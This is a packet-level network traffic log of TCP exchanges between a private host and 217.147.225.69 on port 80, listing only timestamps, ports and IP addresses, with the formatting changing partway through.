Oct 31, 2023 13:19:59.333975077 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334034920 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.334034920 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.334151983 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.334223986 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334270954 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334341049 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334372997 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.334424973 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.334490061 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.334717035 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334845066 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334867001 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.334912062 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334929943 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334949017 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334965944 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.334996939 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.335114002 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.335119963 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335139990 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335243940 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.335243940 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.335253000 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335273027 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335385084 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335490942 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.335539103 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.335632086 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335655928 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335675001 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335720062 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.335829020 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.335876942 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336273909 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336297989 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336318016 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336337090 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336400986 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336400986 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336451054 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336486101 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336535931 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336548090 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336635113 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336683035 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336685896 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336735964 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.336882114 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.336987972 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337024927 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337044001 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337152004 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337179899 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337235928 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337239981 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337239981 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337337017 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337480068 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337629080 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337651014 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337668896 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337687969 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337718010 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337754011 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337754011 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337802887 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337851048 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337893009 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337899923 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.337913036 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337932110 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.337986946 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.338078022 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.338090897 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.338126898 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.338146925 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.338233948 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.338282108 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.338351965 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.338371038 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338465929 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338521004 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338540077 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338546038 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338591099 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338598013 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338675976 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338725090 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338752985 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.338884115 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339003086 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339021921 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339040041 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339090109 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339131117 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339143991 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339183092 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339247942 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339296103 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339368105 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339386940 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339462996 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339520931 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339520931 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339591026 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339651108 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339716911 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339742899 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339770079 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339871883 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339880943 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339988947 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.339993000 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340037107 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340126038 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340131998 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340261936 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340470076 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340579987 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340603113 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340620995 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340626001 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340640068 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340657949 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340703964 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340703964 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340718031 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340751886 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340801001 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340892076 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340917110 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.340938091 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341042042 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341042042 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341123104 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341146946 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341216087 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341249943 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341301918 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341373920 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341406107 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341510057 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341720104 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341773987 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341792107 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341809034 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341826916 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341844082 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341876030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341876030 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341892004 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341922998 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341922998 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.341970921 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342009068 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342020988 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342020988 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342108965 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342159986 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.342263937 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629782915 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629861116 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629915953 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.629991055 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.630064964 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.630119085 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.630227089 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.631906986 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.631982088 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632149935 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632204056 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632813931 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632884979 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632941008 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.632996082 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633002043 CET5007680192.168.11.20217.147.225.69
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633049965 CET8050076217.147.225.69192.168.11.20
                                                                                                                                                                                                                    Oct 31, 2023 13:19:59.633066893 CET5007680192.168.11.20217.147.225.69
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2023 13:19:59.633066893 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.633104086 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.633219004 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.633291960 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.633316040 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.633415937 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.633472919 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.633510113 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.633573055 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.633627892 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.633723974 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.633779049 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.633833885 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.633944988 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634017944 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634073973 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634133101 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634160995 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634160995 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634186983 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634227991 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634243011 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634296894 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634350061 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634350061 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634402990 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634418011 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634457111 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634463072 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634510994 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634563923 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634582996 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634582996 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634643078 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634697914 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634701014 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634699106 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634757996 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634812117 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634859085 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634923935 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.634954929 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.634999037 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635057926 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635108948 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635112047 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635165930 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635219097 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635221004 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635272980 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635276079 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635327101 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635345936 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635345936 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635380983 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635435104 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635441065 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635490894 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635534048 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635545969 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635590076 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635596037 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635643005 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635695934 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635716915 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635768890 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635768890 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635834932 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635881901 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.635890961 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635945082 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.635997057 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636089087 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636104107 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636157990 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636157990 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636217117 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636272907 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636277914 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636327028 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636380911 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636435032 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636460066 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636460066 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636528015 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636528969 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636578083 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636590004 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636635065 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636687994 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636740923 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636758089 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636828899 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636828899 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636842012 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636889935 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.636898994 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.636953115 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637005091 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637033939 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.637058973 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637105942 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.637152910 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.637157917 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637207985 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.637259960 CET | 80 | 50076 | 217.147.225.69 | 192.168.11.20
Oct 31, 2023 13:19:59.637372017 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
Oct 31, 2023 13:19:59.637444019 CET | 50076 | 80 | 192.168.11.20 | 217.147.225.69
